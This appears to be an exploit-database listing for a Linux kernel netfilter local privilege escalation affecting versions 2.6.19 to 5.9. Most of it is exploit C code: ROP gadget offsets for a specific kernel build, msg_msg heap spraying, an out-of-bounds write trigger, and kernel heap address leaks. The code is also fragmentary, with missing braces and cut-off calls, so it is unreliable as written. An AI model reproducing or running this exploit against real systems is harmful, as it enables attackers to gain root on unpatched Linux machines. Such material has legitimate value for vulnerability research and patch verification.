Linux kernel 2.6.19 < 5.9 netfilter local privilege escalation Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2021-07-15 |
Type : local |
Platform : linux
This exploit / vulnerability Linux kernel 2.6.19 < 5.9 netfilter local privilege escalation is for educational purposes only and if it is used you will do on your own risk!
// clang-format off
#ifdef KERNEL_COS_5_4_89
// 0xffffffff810360f8 : push rax ; jmp qword ptr [rcx]
// 0xffffffff815401df : pop rsp ; pop rbx ; ret
#define POP_RSP_POP_RBX_RET 0x5401DF
// 0xffffffff816d3a65 : enter 0, 0 ; pop rbx ; pop r14 ; pop rbp ; ret
#define ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET 0x6D3A65
// 0xffffffff814ddfa8 : mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret
// 0xffffffff81073972 : push qword ptr [rbp + 0x25] ; pop rbp ; ret
#define PUSH_QWORD_PTR_RBP_25_POP_RBP_RET 0x73972
// 0xffffffff8106748c : mov rsp, rbp ; pop rbp ; ret
#define MOV_RSP_RBP_POP_RBP_RET 0x6748C
// 0xffffffff810c7c80 : pop rdx ; ret
#define POP_RDX_RET 0xC7C80
// 0xffffffff8143a2b4 : pop rsi ; ret
#define POP_RSI_RET 0x43A2B4
// 0xffffffff81067520 : pop rdi ; ret
#define POP_RDI_RET 0x67520
// 0xffffffff8100054b : pop rbp ; ret
#define POP_RBP_RET 0x54B
// 0xffffffff812383a6 : mov rdi, rax ; jne 0xffffffff81238396 ; pop rbp ; ret
#define MOV_RDI_RAX_JNE_POP_RBP_RET 0x2383A6
// 0xffffffff815282e1 : cmp rdx, 1 ; jne 0xffffffff8152831d ; pop rbp ; ret
#define CMP_RDX_1_JNE_POP_RBP_RET 0x5282E1
// 0xffffffff811a21c3 : enter 0, 0 ; pop rbx ; pop r12 ; pop rbp ; ret
#define ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET 0x1A21C3
// 0xffffffff81084de3 : mov qword ptr [r12], rbx ; pop rbx ; pop r12 ; pop rbp ; ret
// 0xffffffff816a98ff : push qword ptr [rbp + 0xa] ; pop rbp ; ret
// 0xffffffff810891bc : mov rsp, rbp ; pop rbp ; ret
// 0xffffffff810f5633 : pop rcx ; ret
#define POP_RCX_RET 0xF5633
// 0xffffffff811abaae : pop rsi ; ret
#define POP_RSI_RET 0x1ABAAE
// 0xffffffff81089250 : pop rdi ; ret
#define POP_RDI_RET 0x89250
// 0xffffffff810005ae : pop rbp ; ret
#define POP_RBP_RET 0x5AE
// 0xffffffff81557894 : mov rdi, rax ; jne 0xffffffff81557888 ; xor eax, eax ; ret
#define MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET 0x557894
// 0xffffffff810724db : cmp rcx, 4 ; jne 0xffffffff810724c0 ; pop rbp ; ret
#define CMP_RCX_4_JNE_POP_RBP_RET 0x724DB
printf("[*] Spraying primary messages...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
memset(&msg_primary, 0, sizeof(msg_primary));
*(int *)&msg_primary.mtext[0] = MSG_TAG;
*(int *)&msg_primary.mtext[4] = i;
if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
goto err_rmid;
printf("[*] Spraying secondary messages...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
memset(&msg_secondary, 0, sizeof(msg_secondary));
*(int *)&msg_secondary.mtext[0] = MSG_TAG;
*(int *)&msg_secondary.mtext[4] = i;
if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
goto err_rmid;
printf("[*] Creating holes in primary messages...\n");
for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
goto err_rmid;
printf("[*] Triggering out-of-bounds write...\n");
if (trigger_oob_write(s) < 0)
goto err_rmid;
printf("[*] Searching for corrupted primary message...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
if (i != 0 && (i % HOLE_STEP) == 0)
if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
goto err_no_rmid;
if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
printf("[-] Error could not corrupt any primary message.\n");
goto err_no_rmid;
if (*(int *)&msg_secondary.mtext[4] != i) {
fake_idx = i;
real_idx = *(int *)&msg_secondary.mtext[4];
if (fake_idx == -1 && real_idx == -1) {
printf("[-] Error could not corrupt any primary message.\n");
goto err_no_rmid;
// fake_idx's primary message has a corrupted next pointer; wrongly
// pointing to real_idx's secondary message.
printf("[+] fake_idx: %x\n", fake_idx);
printf("[+] real_idx: %x\n", real_idx);
printf("[*] Freeing real secondary message...\n");
if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary),
goto err_rmid;
// Reclaim the previously freed secondary message with a fake msg_msg of
// maximum possible size.
printf("[*] Spraying fake secondary messages...\n");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto err_rmid;
// Use the fake secondary message to read out-of-bounds.
printf("[*] Leaking adjacent secondary message...\n");
if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
goto err_rmid;
// Check if the leak is valid.
if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) {
printf("[-] Error could not leak adjacent secondary message.\n");
goto err_rmid;
// The secondary message contains a pointer to the primary message.
msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
kheap_addr = msg->m_list_next;
if (kheap_addr & (PRIMARY_SIZE - 1))
kheap_addr = msg->m_list_prev;
printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
if ((kheap_addr & 0xFFFF000000000000) != 0xFFFF000000000000) {
printf("[-] Error kernel heap address is incorrect.\n");
goto err_rmid;
// Put kheap_addr at next to leak its content. Assumes zero bytes before
// kheap_addr.
printf("[*] Spraying fake secondary messages...\n");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto err_rmid;
// Use the fake secondary message to read from kheap_addr.
printf("[*] Leaking primary message...\n");
if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
goto err_rmid;
// Check if the leak is valid.
if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) {
printf("[-] Error could not leak primary message.\n");
goto err_rmid;
// The primary message contains a pointer to the secondary message.
msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
kheap_addr = msg->m_list_next;
if (kheap_addr & (SECONDARY_SIZE - 1))
kheap_addr = msg->m_list_prev;
// Calculate the address of the fake secondary message.
kheap_addr -= SECONDARY_SIZE;
printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
if ((kheap_addr & 0xFFFF00000000FFFF) != 0xFFFF000000000000) {
printf("[-] Error kernel heap address is incorrect.\n");
goto err_rmid;
printf("[*] Cleaning up...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
// TODO: Fix next pointer.
if (i == fake_idx)
if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
perror("[-] msgctl");
for (int i = 0; i < NUM_SOCKETS; i++) {
if (close(ss[i][0]) < 0)
perror("[-] close");
if (close(ss[i][1]) < 0)
perror("[-] close");
if (close(s) < 0)
perror("[-] close");